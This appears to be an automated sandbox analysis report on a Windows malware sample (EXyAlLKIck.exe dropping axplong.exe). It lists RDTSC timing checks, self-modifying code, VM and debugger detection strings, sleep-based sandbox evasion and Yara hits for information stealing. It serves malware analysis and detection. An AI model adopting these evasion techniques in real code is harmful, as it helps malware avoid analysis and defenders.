Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A62 second address: 50E0A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A68 second address: 50E0A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A6C second address: 50E0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-24h], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FE5B8D9CB5Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A89 second address: 50E0A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0A8E second address: 50E0A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0061 second address: 50E0066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A7155 second address: 8A715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A715B second address: 8A717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jo 00007FE5B8F4A746h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A7473 second address: 8A7479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A7722 second address: 8A773E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A7479 second address: 8A748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jp 00007FE5B8F4A75Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A748C second address: 8A7490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A7490 second address: 8A7496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A7722 second address: 8A773E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB68h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A8293 second address: 8A8299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A8299 second address: 8A82B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8D9CB66h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A82B6 second address: 8A82CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE5B8F4A746h 0x0000000e jnp 00007FE5B8F4A746h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8A82CA second address: 8A82D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89C57B second address: 89C581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 871734 second address: 871749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 871749 second address: 87174F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 87174F second address: 871755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 7BEA73 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 95CDEC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 95CADA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 985B9D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 9EDF44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 70EA73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 8ACDEC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 8ACADA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 8D5B9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 93DF44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Code function: 0_2_05130B6A rdtsc 0_2_05130B6A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 405 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7900 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7900 Thread sleep time: -76038s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860 Thread sleep count: 405 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860 Thread sleep time: -12150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7992 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7884 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7884 Thread sleep time: -68034s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: axplong.exe, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: EXyAlLKIck.exe, 00000000.00000002.2055040575.000000000093D000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2085188988.000000000088D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2085933555.000000000088D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\EXyAlLKIck.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Code function: 0_2_05130B6A rdtsc 0_2_05130B6A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006D645B mov eax, dword ptr fs:[00000030h] 7_2_006D645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006DA1C2 mov eax, dword ptr fs:[00000030h] 7_2_006DA1C2
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: axplong.exe, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006BD312 cpuid 7_2_006BD312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_006BCB1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006A65B0 LookupAccountNameA, 7_2_006A65B0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 7.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EXyAlLKIck.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2014529476.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2085097235.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2045418136.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2054954455.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2671343641.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2085839344.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2044771326.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs